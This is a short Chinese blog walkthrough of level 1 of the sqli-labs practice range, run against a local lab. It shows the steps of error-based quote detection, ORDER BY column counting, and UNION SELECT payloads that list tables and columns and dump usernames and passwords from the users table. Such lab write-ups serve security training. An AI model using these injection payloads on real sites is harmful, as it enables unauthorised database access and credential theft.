一,进入sqli-labs-master靶场第一关,加入参数id.列如:
127.0.0.1
二.判断SQL注入漏洞--引起报错找到闭合与注释
加单引号判断闭合,发现为字符型注入,
三. 使用order by 判断字段数有几列:3列回显正常,4列出现报错,说明只有3列
四.使用union select确定回显点
五.看到2和3的回显查询数据库相关信息
六,查询数据库下的表信息
?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security' --+
七,查询表下的字段信息
?id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='security'%20 and table_name='users'%20 --+
八,查询字段内容
?id=-1' union select 1,2,group_concat(id,0x7e,username,0x7e,password) from users --+
标签:group,union,labs,sqli,攻略,table,id,select,schema From: https://blog.csdn.net/2301_81881972/article/details/141197720